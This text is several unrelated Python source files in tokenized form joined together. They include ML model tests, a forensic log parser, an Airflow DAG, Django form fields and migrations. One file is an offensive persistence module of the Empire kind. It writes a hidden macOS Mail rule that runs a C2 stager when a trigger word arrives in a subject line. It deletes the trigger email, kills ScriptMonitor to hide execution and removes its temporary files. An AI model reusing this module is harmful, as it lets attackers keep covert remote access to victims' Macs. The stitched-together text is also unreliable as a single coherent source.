3)<line_sep>builder.PrependUOffsetTRelative(tensor2_offset)<line_sep>builder.PrependUOffsetTRelative(tensor1_offset)<line_sep>builder.PrependUOffsetTRelative(tensor0_offset)<line_sep>tensors_offset=builder.EndVector(3)<line_sep>schema_fb.SubGraphStartInputsVector(builder 1)<line_sep>builder.PrependInt32(0)<line_sep>inputs_offset=builder.EndVector(1)<line_sep>schema_fb.SubGraphStartOutputsVector(builder 1)<line_sep>builder.PrependInt32(2)<line_sep>outputs_offset=builder.EndVector(1)<line_sep>schema_fb.OperatorCodeStart(builder)<line_sep>schema_fb.OperatorCodeAddBuiltinCode(builder schema_fb.BuiltinOperator.ADD)<line_sep>schema_fb.OperatorCodeAddDeprecatedBuiltinCode(builder schema_fb.BuiltinOperator.ADD)<line_sep>schema_fb.OperatorCodeAddVersion(builder 1)<line_sep>code_offset=schema_fb.OperatorCodeEnd(builder)<line_sep>schema_fb.ModelStartOperatorCodesVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(code_offset)<line_sep>codes_offset=builder.EndVector(1)<line_sep>schema_fb.OperatorStartInputsVector(builder 2)<line_sep>builder.PrependInt32(0)<line_sep>builder.PrependInt32(1)<line_sep>op_inputs_offset=builder.EndVector(2)<line_sep>schema_fb.OperatorStartOutputsVector(builder 1)<line_sep>builder.PrependInt32(2)<line_sep>op_outputs_offset=builder.EndVector(1)<line_sep>schema_fb.OperatorStart(builder)<line_sep>schema_fb.OperatorAddOpcodeIndex(builder 0)<line_sep>schema_fb.OperatorAddInputs(builder op_inputs_offset)<line_sep>schema_fb.OperatorAddOutputs(builder op_outputs_offset)<line_sep>op_offset=schema_fb.OperatorEnd(builder)<line_sep>schema_fb.SubGraphStartOperatorsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(op_offset)<line_sep>ops_offset=builder.EndVector(1)<line_sep>string3_offset=builder.CreateString('subgraph_name')<line_sep>schema_fb.SubGraphStart(builder)<line_sep>schema_fb.SubGraphAddName(builder string3_offset)<line_sep>schema_fb.SubGraphAddTensors(builder tensors_offset)<line_sep>schema_fb.SubGraphAddInputs(builder inputs_offset)<line_sep>schema_fb.SubGraphAddOutputs(builder outputs_offset)<line_sep>schema_fb.SubGraphAddOperators(builder ops_offset)<line_sep>subgraph_offset=schema_fb.SubGraphEnd(builder)<line_sep>schema_fb.ModelStartSubgraphsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(subgraph_offset)<line_sep>subgraphs_offset=builder.EndVector(1)<line_sep>signature_key=builder.CreateString('my_key')<line_sep>input_tensor_string=builder.CreateString('input_tensor')<line_sep>output_tensor_string=builder.CreateString('output_tensor')<line_sep># Signature Inputs
schema_fb.TensorMapStart(builder)<line_sep>schema_fb.TensorMapAddName(builder input_tensor_string)<line_sep>schema_fb.TensorMapAddTensorIndex(builder 1)<line_sep>input_tensor=schema_fb.TensorMapEnd(builder)<line_sep># Signature Outputs
schema_fb.TensorMapStart(builder)<line_sep>schema_fb.TensorMapAddName(builder output_tensor_string)<line_sep>schema_fb.TensorMapAddTensorIndex(builder 2)<line_sep>output_tensor=schema_fb.TensorMapEnd(builder)<line_sep>schema_fb.SignatureDefStartInputsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(input_tensor)<line_sep>signature_inputs_offset=builder.EndVector(1)<line_sep>schema_fb.SignatureDefStartOutputsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(output_tensor)<line_sep>signature_outputs_offset=builder.EndVector(1)<line_sep>schema_fb.SignatureDefStart(builder)<line_sep>schema_fb.SignatureDefAddSignatureKey(builder signature_key)<line_sep>schema_fb.SignatureDefAddInputs(builder signature_inputs_offset)<line_sep>schema_fb.SignatureDefAddOutputs(builder signature_outputs_offset)<line_sep>signature_offset=schema_fb.SignatureDefEnd(builder)<line_sep>schema_fb.ModelStartSignatureDefsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(signature_offset)<line_sep>signature_defs_offset=builder.EndVector(1)<line_sep>string4_offset=builder.CreateString('model_description')<line_sep>schema_fb.ModelStart(builder)<line_sep>schema_fb.ModelAddVersion(builder TFLITE_SCHEMA_VERSION)<line_sep>schema_fb.ModelAddOperatorCodes(builder codes_offset)<line_sep>schema_fb.ModelAddSubgraphs(builder subgraphs_offset)<line_sep>schema_fb.ModelAddDescription(builder string4_offset)<line_sep>schema_fb.ModelAddBuffers(builder buffers_offset)<line_sep>schema_fb.ModelAddSignatureDefs(builder signature_defs_offset)<line_sep>model_offset=schema_fb.ModelEnd(builder)<line_sep>builder.Finish(model_offset)<line_sep>model=builder.Output()<line_sep><return>model<block_end><def_stmt>load_model_from_flatbuffer flatbuffer_model<block_start>"""Loads a model as a python object from a flatbuffer model."""<line_sep>model=schema_fb.Model.GetRootAsModel(flatbuffer_model 0)<line_sep>model=schema_fb.ModelT.InitFromObj(model)<line_sep><return>model<block_end><def_stmt>build_mock_model <block_start>"""Creates an object containing an example model."""<line_sep>model=build_mock_flatbuffer_model()<line_sep><return>load_model_from_flatbuffer(model)<block_end> |
<import_stmt>pkg_resources<line_sep>pkg_resources.declare_namespace(__name__)<import_from_stmt>.namegen NameGenerator<line_sep>namegen=NameGenerator()<line_sep> |
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""<import_stmt>pytest<import_stmt>numpy<as>np<import_from_stmt>nncf.torch.pruning.filter_pruning.algo FilterPruningController<import_from_stmt>tests.torch.helpers create_compressed_model_and_algo_for_test<import_from_stmt>tests.torch.helpers check_correct_nncf_modules_replacement<import_from_stmt>tests.torch.pruning.helpers get_basic_pruning_config<import_from_stmt>tests.torch.pruning.helpers BigPruningTestModel<def_stmt>create_pruning_algo_with_config config<block_start>"""
Create filter_pruning with default params.
:param config: config for the algorithm
:return pruned model, pruning_algo, nncf_modules
"""<line_sep>config['compression']['algorithm']='filter_pruning'<line_sep>model=BigPruningTestModel()<line_sep>pruned_model,pruning_algo=create_compressed_model_and_algo_for_test(BigPruningTestModel() config)<line_sep># Check that all modules was correctly replaced by NNCF modules and return this NNCF modules
_,nncf_modules=check_correct_nncf_modules_replacement(model pruned_model)<line_sep><return>pruned_model pruning_algo nncf_modules<block_end>@pytest.mark.parametrize(('all_weights' 'pruning_rate_to_set' 'ref_pruning_rates' 'ref_global_pruning_rate') [(<false> 0.5 [0.5 0.5] 0.5) (<true> 0.5 [0.28125 0.60937] 0.5) (<false> {0:0.6 1:0.8} [0.5 0.75] 0.69986) ])<def_stmt>test_setting_pruning_rate all_weights pruning_rate_to_set ref_pruning_rates ref_global_pruning_rate<block_start>"""
Test setting global and groupwise pruning rates via the set_pruning_rate method.
"""<line_sep># Creating algorithm with empty config
config=get_basic_pruning_config(input_sample_size=[1 1 8 8])<line_sep>config['compression']['pruning_init']=0.2<line_sep>config['compression']['params']['all_weights']=all_weights<line_sep>_,pruning_controller,_=create_pruning_algo_with_config(config)<assert_stmt>isinstance(pruning_controller FilterPruningController)<line_sep>pruning_controller.set_pruning_rate(pruning_rate_to_set)<line_sep>groupwise_pruning_rates=list(pruning_controller.current_groupwise_pruning_rate.values())<assert_stmt>np.isclose(groupwise_pruning_rates ref_pruning_rates).all()<assert_stmt>np.isclose(pruning_controller.pruning_rate ref_global_pruning_rate).all()<block_end><def_stmt>test_can_set_compression_rate_in_filter_pruning_algo <block_start>"""
Test setting the global pruning rate via the compression_rate property.
"""<line_sep># Creating algorithm with empty config
config=get_basic_pruning_config(input_sample_size=[1 1 8 8])<line_sep>config['compression']['pruning_init']=0.2<line_sep>_,pruning_controller,_=create_pruning_algo_with_config(config)<line_sep>pruning_controller.compression_rate=0.65<assert_stmt>pytest.approx(pruning_controller.compression_rate 1e-2)<eq>0.65<block_end> |
# -*- coding: utf-8 -*-
"""Parser for NetworkMiner .fileinfos files."""<import_from_stmt>dfdatetime time_elements<as>dfdatetime_time_elements<import_from_stmt>plaso.containers events<import_from_stmt>plaso.containers time_events<import_from_stmt>plaso.lib definitions<import_from_stmt>plaso.parsers dsv_parser<import_from_stmt>plaso.parsers manager<class_stmt>NetworkMinerEventData(events.EventData)<block_start>"""NetworkMiner event Data.
Attributes:
destination_ip (str): Destination IP address.
destination_port (str): Destination port number.
file_details (string): Details about the file.
file_md5 (string): MD5 hash of the file.
file_path (string): File path to where it was downloaded.
file_size (string): Size of the file.
filename (string): Name of the file.
source_ip (str): Originating IP address.
source_port (str): Originating port number.
"""<line_sep>DATA_TYPE='networkminer:fileinfos:file'<def_stmt>__init__ self<block_start>super(NetworkMinerEventData self).__init__(data_type=self.DATA_TYPE)<line_sep>self.destination_ip=<none><line_sep>self.destination_port=<none><line_sep>self.file_details=<none><line_sep>self.file_md5=<none><line_sep>self.file_path=<none><line_sep>self.file_size=<none><line_sep>self.filename=<none><line_sep>self.source_ip=<none><line_sep>self.source_port=<none><block_end><block_end><class_stmt>NetworkMinerParser(dsv_parser.DSVParser)<block_start>"""Parser for NetworkMiner .fileinfos files."""<line_sep>NAME='networkminer_fileinfo'<line_sep>DATA_FORMAT='NetworkMiner .fileinfos file'<line_sep>COLUMNS=('source_ip' 'source_port' 'destination_ip' 'destination_port' 'filename' 'file_path' 'file_size' 'unused' 'file_md5' 'unused2' 'file_details' 'unused4' 'timestamp')<line_sep>MIN_COLUMNS=13<def_stmt>ParseRow self parser_mediator row_offset row<block_start>"""Parses a line of the log file and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row_offset (int): line number of the row.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
"""<line_sep>event_data=NetworkMinerEventData()<if_stmt>row.get('timestamp' <none>)<ne>'Timestamp'<block_start>date_time=dfdatetime_time_elements.TimeElementsInMicroseconds()<for_stmt>field ('source_ip' 'source_port' 'destination_ip' 'destination_port' 'filename' 'file_path' 'file_size' 'file_md5' 'file_details')<block_start>setattr(event_data field row[field])<block_end><try_stmt><block_start>timestamp=row.get('timestamp' <none>)<line_sep>date_time.CopyFromStringISO8601(timestamp)<block_end><except_stmt>ValueError<block_start>parser_mediator.ProduceExtractionWarning('invalid date time value')<line_sep><return><block_end>event=time_events.DateTimeValuesEvent(date_time definitions.TIME_DESCRIPTION_WRITTEN)<line_sep>parser_mediator.ProduceEventWithEventData(event event_data)<block_end><block_end><def_stmt>VerifyRow self parser_mediator row<block_start>"""Verifies if a line of the file is in the expected format.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
Returns:
bool: True if this is the correct parser, False otherwise.
"""<if_stmt>len(row)<ne>self.MIN_COLUMNS<block_start><return><false><block_end># Check the date format
# If it doesn't parse, then this isn't a NetworkMiner .fileinfos file.
timestamp_value=row.get('timestamp' <none>)<if_stmt>timestamp_value<ne>'Timestamp'<block_start>date_time=dfdatetime_time_elements.TimeElementsInMicroseconds()<try_stmt><block_start>date_time.CopyFromStringISO8601(timestamp_value)<block_end><except_stmt>ValueError<block_start><return><false><block_end><block_end><return><true><block_end><block_end>manager.ParsersManager.RegisterParser(NetworkMinerParser)<line_sep> |
<import_stmt>airflow<import_from_stmt>airflow DAG<import_from_stmt>airflow.operators.dummy DummyOperator<import_from_stmt>airflow.operators.python PythonOperator<line_sep>ERP_CHANGE_DATE=airflow.utils.dates.days_ago(1)<def_stmt>_fetch_sales **context<block_start><if_stmt>context["execution_date"]<l>ERP_CHANGE_DATE<block_start>_fetch_sales_old(**context)<block_end><else_stmt><block_start>_fetch_sales_new(**context)<block_end><block_end><def_stmt>_fetch_sales_old **context<block_start>print("Fetching sales data (OLD)...")<block_end><def_stmt>_fetch_sales_new **context<block_start>print("Fetching sales data (NEW)...")<block_end><def_stmt>_clean_sales **context<block_start><if_stmt>context["execution_date"]<l>airflow.utils.dates.days_ago(1)<block_start>_clean_sales_old(**context)<block_end><else_stmt><block_start>_clean_sales_new(**context)<block_end><block_end><def_stmt>_clean_sales_old **context<block_start>print("Preprocessing sales data (OLD)...")<block_end><def_stmt>_clean_sales_new **context<block_start>print("Preprocessing sales data (NEW)...")<block_end><with_stmt>DAG(dag_id="02_branch_function" start_date=airflow.utils.dates.days_ago(3) schedule_interval="@daily" )<as>dag<block_start>start=DummyOperator(task_id="start")<line_sep>fetch_sales=PythonOperator(task_id="fetch_sales" python_callable=_fetch_sales)<line_sep>clean_sales=PythonOperator(task_id="clean_sales" python_callable=_clean_sales)<line_sep>fetch_weather=DummyOperator(task_id="fetch_weather")<line_sep>clean_weather=DummyOperator(task_id="clean_weather")<line_sep>join_datasets=DummyOperator(task_id="join_datasets")<line_sep>train_model=DummyOperator(task_id="train_model")<line_sep>deploy_model=DummyOperator(task_id="deploy_model")<line_sep>start<rshift>[fetch_sales fetch_weather]<line_sep>fetch_sales<rshift>clean_sales<line_sep>fetch_weather<rshift>clean_weather<line_sep>[clean_sales clean_weather]<rshift>join_datasets<line_sep>join_datasets<rshift>train_model<rshift>deploy_model<block_end> |
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
<import_stmt>pytest<import_from_stmt>common.onnx_layer_test_class Caffe2OnnxLayerTest<class_stmt>TestSqueeze(Caffe2OnnxLayerTest)<block_start><def_stmt>create_squeeze_net self axes input_shape output_shape ir_version<block_start>"""
ONNX net IR net
Input->Squeeze(axes=0)->Output => Input->Reshape
"""<line_sep>#
# Create ONNX model
#
<import_stmt>onnx<import_from_stmt>onnx helper<import_from_stmt>onnx TensorProto<line_sep>input=helper.make_tensor_value_info('input' TensorProto.FLOAT input_shape)<line_sep>output=helper.make_tensor_value_info('output' TensorProto.FLOAT output_shape)<line_sep>node_squeeze_def=onnx.helper.make_node('Squeeze' inputs=['input'] outputs=['output'] axes=axes)<line_sep># Create the graph (GraphProto)
graph_def=helper.make_graph([node_squeeze_def] 'test_squeeze_model' [input] [output] )<line_sep># Create the model (ModelProto)
onnx_net=helper.make_model(graph_def producer_name='test_squeeze_model')<line_sep>#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net=<none><line_sep><return>onnx_net ref_net<block_end><def_stmt>create_squeeze_net_const self axes input_shape output_shape ir_version<block_start>"""
ONNX net IR net
Input->Concat(+squeezed const)->Output => Input->Concat(+const)
"""<line_sep>#
# Create ONNX model
#
<import_stmt>onnx<import_from_stmt>onnx helper<import_from_stmt>onnx TensorProto<import_stmt>numpy<as>np<line_sep>concat_axis=0<line_sep>concat_output_shape=output_shape.copy()<line_sep>concat_output_shape[concat_axis]<augmul>2<line_sep>input=helper.make_tensor_value_info('input' TensorProto.FLOAT output_shape)<line_sep>output=helper.make_tensor_value_info('output' TensorProto.FLOAT concat_output_shape)<line_sep>const_number=np.prod(input_shape)<line_sep>constant=np.random.randint(-127 127 const_number).astype(np.float)<line_sep>constant=np.reshape(constant input_shape)<line_sep>node_const_def=onnx.helper.make_node('Constant' inputs=[] outputs=['const1'] value=helper.make_tensor(name='const_tensor' data_type=TensorProto.FLOAT dims=constant.shape vals=constant.flatten() ) )<line_sep>node_squeeze_def=onnx.helper.make_node('Squeeze' inputs=['const1'] outputs=['squeeze1'] axes=axes)<line_sep>node_concat_def=onnx.helper.make_node('Concat' inputs=['input' 'squeeze1'] outputs=['output'] axis=concat_axis)<line_sep># Create the graph (GraphProto)
graph_def=helper.make_graph([node_const_def node_squeeze_def node_concat_def] 'test_squeeze_model' [input] [output] )<line_sep># Create the model (ModelProto)
onnx_net=helper.make_model(graph_def producer_name='test_squeeze_model')<line_sep>#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net=<none><line_sep><return>onnx_net ref_net<block_end>test_data_5D=[dict(axes=[0] input_shape=[1 2 3 10 10] output_shape=[2 3 10 10]) dict(axes=[1] input_shape=[2 1 3 10 10] output_shape=[2 3 10 10]) dict(axes=[2] input_shape=[2 3 1 10 10] output_shape=[2 3 10 10]) dict(axes=[3] input_shape=[2 3 10 1 10] output_shape=[2 3 10 10]) dict(axes=[4] input_shape=[2 3 10 10 1] output_shape=[2 3 10 10]) dict(axes=[0 1] input_shape=[1 1 3 10 10] output_shape=[3 10 10]) dict(axes=[0 2] input_shape=[1 3 1 10 10] output_shape=[3 10 10]) dict(axes=[0 3] input_shape=[1 3 10 1 10] output_shape=[3 10 10]) dict(axes=[0 4] input_shape=[1 3 10 10 1] output_shape=[3 10 10]) dict(axes=[1 2] input_shape=[3 1 1 10 10] output_shape=[3 10 10]) dict(axes=[1 3] input_shape=[3 1 10 1 10] output_shape=[3 10 10]) dict(axes=[1 4] input_shape=[3 1 10 10 1] output_shape=[3 10 10]) dict(axes=[2 3] input_shape=[3 10 1 1 10] output_shape=[3 10 10]) dict(axes=[2 4] input_shape=[3 10 1 10 1] output_shape=[3 10 10]) dict(axes=[3 4] input_shape=[3 10 10 1 1] output_shape=[3 10 10]) dict(axes=[0 1 2] input_shape=[1 1 1 10 10] output_shape=[10 10]) dict(axes=[0 1 3] input_shape=[1 1 10 1 10] output_shape=[10 10]) dict(axes=[0 1 4] input_shape=[1 1 10 10 1] output_shape=[10 10]) dict(axes=[0 2 3] input_shape=[1 10 1 1 10] output_shape=[10 10]) dict(axes=[0 2 4] input_shape=[1 10 1 10 1] output_shape=[10 10]) dict(axes=[0 3 4] input_shape=[1 10 10 1 1] output_shape=[10 10]) dict(axes=[1 2 3] input_shape=[10 1 1 1 10] output_shape=[10 10]) dict(axes=[1 2 4] input_shape=[10 1 1 10 1] output_shape=[10 10]) dict(axes=[1 3 4] input_shape=[10 1 10 1 1] output_shape=[10 10]) dict(axes=[2 3 4] input_shape=[10 10 1 1 1] output_shape=[10 10])]<line_sep>test_data_4D=[dict(axes=[0] input_shape=[1 3 10 10] output_shape=[3 10 10]) dict(axes=[1] input_shape=[3 1 10 10] output_shape=[3 10 10]) dict(axes=[2] input_shape=[3 10 1 10] output_shape=[3 10 10]) dict(axes=[3] input_shape=[3 10 10 1] output_shape=[3 10 10]) dict(axes=[0 1] input_shape=[1 1 10 10] output_shape=[10 10]) dict(axes=[0 2] input_shape=[1 10 1 10] output_shape=[10 10]) dict(axes=[0 3] input_shape=[1 10 10 1] output_shape=[10 10]) dict(axes=[1 2] input_shape=[10 1 1 10] output_shape=[10 10]) dict(axes=[1 3] input_shape=[10 1 10 1] output_shape=[10 10]) dict(axes=[2 3] input_shape=[10 10 1 1] output_shape=[10 10])]<line_sep>test_data_3D=[dict(axes=[0] input_shape=[1 10 10] output_shape=[10 10]) dict(axes=[1] input_shape=[10 1 10] output_shape=[10 10]) dict(axes=[2] input_shape=[10 10 1] output_shape=[10 10])]<line_sep>@pytest.mark.parametrize("params" test_data_5D)@pytest.mark.nightly<def_stmt>test_squeeze_5D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_4D)@pytest.mark.nightly<def_stmt>test_squeeze_4D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_3D)@pytest.mark.nightly<def_stmt>test_squeeze_3D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_5D)@pytest.mark.nightly<def_stmt>test_squeeze_const_5D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net_const(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_4D)@pytest.mark.nightly<def_stmt>test_squeeze_const_4D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net_const(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_3D)@pytest.mark.nightly<def_stmt>test_squeeze_const_3D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net_const(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end><block_end> |
<import_from_stmt>django forms<import_from_stmt>django.core.exceptions ImproperlyConfigured<import_from_stmt>mayan.apps.acls.models AccessControlList<class_stmt>FilteredModelFieldMixin<block_start><def_stmt>__init__ self *args **kwargs<block_start>self.source_model=kwargs.pop('source_model' <none>)<line_sep>self.permission=kwargs.pop('permission' <none>)<line_sep>self.source_queryset=kwargs.pop('source_queryset' <none>)<if_stmt>self.source_queryset<is><none><block_start><if_stmt>self.source_model<block_start>self.source_queryset=self.source_model._meta.default_manager.all()<block_end><else_stmt><block_start><raise>ImproperlyConfigured('{} requires a source_queryset or a source_model to be '<concat>'specified as keyword argument.'.format(self.__class__.__name__))<block_end><block_end>kwargs['queryset']=self.source_queryset.none()<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>reload self<block_start><if_stmt>self.permission<and>self.user<block_start>self.queryset=AccessControlList.objects.restrict_queryset(permission=self.permission queryset=self.source_queryset user=self.user)<block_end><else_stmt><block_start>self.queryset=self.source_queryset<block_end><block_end><block_end><class_stmt>FilteredModelChoiceField(FilteredModelFieldMixin forms.ModelChoiceField)<block_start>"""Single selection filtered model choice field"""<block_end><class_stmt>FilteredModelMultipleChoiceField(FilteredModelFieldMixin forms.ModelMultipleChoiceField)<block_start>"""Multiple selection filtered model choice field"""<block_end> |
<import_from_stmt>time time<import_from_stmt>random choice<import_from_stmt>string ascii_uppercase<class_stmt>Module<block_start><def_stmt>__init__ self mainMenu params=[]# metadata info about the module, not modified during runtime
<block_start>self.info={# name for the module that will appear in module menus
'Name':'Mail' # list of one or more authors for the module
'Author':['@n00py'] # more verbose multi-line description of the module
'Description':('Installs a mail rule that will execute an AppleScript stager when a trigger word is present in the Subject of an incoming mail.') # True if the module needs to run in the background
'Background':<false> # File extension to save the file as
'OutputExtension':<none> # if the module needs administrative privileges
'NeedsAdmin':<false> # True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe':<false> # the module language
'Language':'python' # the minimum language version needed
'MinLanguageVersion':'2.6' # list of any references/other comments
'Comments':['https://github.com/n00py/MailPersist']}<line_sep># any options needed by the module, settable during runtime
self.options={# format:
# value_name : {description, required, default_value}
'Agent':{# The 'Agent' option is the only one that MUST be in a module
'Description':'Agent to execute module on.' 'Required':<true> 'Value':''} 'Listener':{'Description':'Listener to use.' 'Required':<true> 'Value':''} 'SafeChecks':{'Description':'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.' 'Required':<true> 'Value':'True'} 'UserAgent':{'Description':'User-agent string to use for the staging request (default, none, or other).' 'Required':<false> 'Value':'default'} 'RuleName':{'Description':'Name of the Rule.' 'Required':<true> 'Value':'Spam Filter'} 'Trigger':{'Description':'The trigger word.' 'Required':<true> 'Value':''}}<line_sep>#
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu=mainMenu<line_sep># During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
<if_stmt>params<block_start><for_stmt>param params# parameter format is [Name, Value]
<block_start>option,value=param<if_stmt>option<in>self.options<block_start>self.options[option]['Value']=value<block_end><block_end><block_end><block_end><def_stmt>generate self obfuscate=<false> obfuscationCommand=""<block_start>ruleName=self.options['RuleName']['Value']<line_sep>trigger=self.options['Trigger']['Value']<line_sep>listenerName=self.options['Listener']['Value']<line_sep>userAgent=self.options['UserAgent']['Value']<line_sep>safeChecks=self.options['SafeChecks']['Value']<line_sep>launcher=self.mainMenu.stagers.generate_launcher(listenerName language='python' userAgent=userAgent safeChecks=safeChecks)<line_sep>launcher=launcher.replace('"' '\\"')<line_sep>launcher=launcher.replace('"' '\\"')<line_sep>launcher="do shell script \"%s\""%(launcher)<line_sep>hex='0123456789ABCDEF'<def_stmt>UUID <block_start><return>''.join([choice(hex)<for>x range(8)])+"-"+''.join([choice(hex)<for>x range(4)])+"-"+''.join([choice(hex)<for>x range(4)])+"-"+''.join([choice(hex)<for>x range(4)])+"-"+''.join([choice(hex)<for>x range(12)])<block_end>CriterionUniqueId=UUID()<line_sep>RuleId=UUID()<line_sep>TimeStamp=str(int(time()))[0:9]<line_sep>SyncedRules="/tmp/"+''.join(choice(ascii_uppercase)<for>i range(12))<line_sep>RulesActiveState="/tmp/"+''.join(choice(ascii_uppercase)<for>i range(12))<line_sep>AppleScript=''.join(choice(ascii_uppercase)<for>i range(12))+".scpt"<line_sep>plist='''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>AllCriteriaMustBeSatisfied</key>
<string>NO</string>
<key>AppleScript</key>
<string>'''+AppleScript+'''</string>
<key>AutoResponseType</key>
<integer>0</integer>
<key>Criteria</key>
<array>
<dict>
<key>CriterionUniqueId</key>
<string>'''+CriterionUniqueId+'''</string>
<key>Expression</key>
<string>'''+str(trigger)+'''</string>
<key>Header</key>
<string>Subject</string>
</dict>
</array>
<key>Deletes</key>
<string>YES</string>
<key>HighlightTextUsingColor</key>
<string>NO</string>
<key>MarkFlagged</key>
<string>NO</string>
<key>MarkRead</key>
<string>NO</string>
<key>NotifyUser</key>
<string>NO</string>
<key>RuleId</key>
<string>'''+RuleId+'''</string>
<key>RuleName</key>
<string>'''+str(ruleName)+'''</string>
<key>SendNotification</key>
<string>NO</string>
<key>ShouldCopyMessage</key>
<string>NO</string>
<key>ShouldTransferMessage</key>
<string>NO</string>
<key>TimeStamp</key>
<integer>'''+TimeStamp+'''</integer>
<key>Version</key>
<integer>1</integer>
</dict>
</array>
</plist>'''<line_sep>plist2='''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>'''+RuleId+'''</key>
<true/>
</dict>
</plist>
'''<line_sep>script="""
import os
home = os.getenv("HOME")
AppleScript = '%s'
SyncedRules = '%s'
RulesActiveState = '%s'
plist = \"\"\"%s\"\"\"
plist2 = \"\"\"%s\"\"\"
payload = \'\'\'%s\'\'\'
payload = payload.replace('&\"', '& ')
payload += "kill `ps -ax | grep ScriptMonitor |grep -v grep | awk \'{print $1}\'`"
payload += '\"'
script = home + "/Library/Application Scripts/com.apple.mail/" + AppleScript
os.system("touch " + SyncedRules)
with open(SyncedRules, 'w+') as f:
f.write(plist)
f.close()
os.system("touch " + RulesActiveState)
with open(RulesActiveState, 'w+') as f:
f.write(plist2)
f.close()
with open(script, 'w+') as f:
f.write(payload)
f.close()
with open("/System/Library/CoreServices/SystemVersion.plist", 'r') as a:
v = a.read()
version = "V1"
if "10.7" in v:
version = "V2"
if "10.7" in v:
version = "V2"
if "10.8" in v:
version = "V2"
if "10.9" in v:
version = "V2"
if "10.10" in v:
version = "V2"
if "10.11" in v:
version = "V3"
if "10.12" in v:
version = "V4"
a.close()
if os.path.isfile(home + "/Library/Mobile Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist"):
print "Trying to write to Mobile"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mobile\ Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist")
else:
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mail/" + version + "/MailData/SyncedRules.plist")
print "Writing to main rules"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + RulesActiveState + "' "+ home + "/Library/Mail/" + version + "/MailData/RulesActiveState.plist")
os.system("rm " + SyncedRules)
os.system("rm " + RulesActiveState)
"""%(AppleScript SyncedRules RulesActiveState plist plist2 launcher)<line_sep><return>script<block_end><block_end> |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-29 08:23
<import_from_future_stmt> unicode_literals<import_stmt>django.db.models.deletion<import_from_stmt>django.db migrations<import_from_stmt>django.db models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('orchestra' '0053_worker_slack_user_id') ]<line_sep>operations=[migrations.RemoveField(# manually-reviewed
model_name='staffingrequest' name='worker' ) migrations.AddField(model_name='staffingrequest' name='communication_preference' field=models.ForeignKey(default=<none> on_delete=django.db.models.deletion.CASCADE to='orchestra.CommunicationPreference') ) migrations.AlterField(model_name='communicationpreference' name='communication_type' field=models.IntegerField(choices=[(0 'task_status_change') (1 'new_task_available')]) ) ]<block_end> |
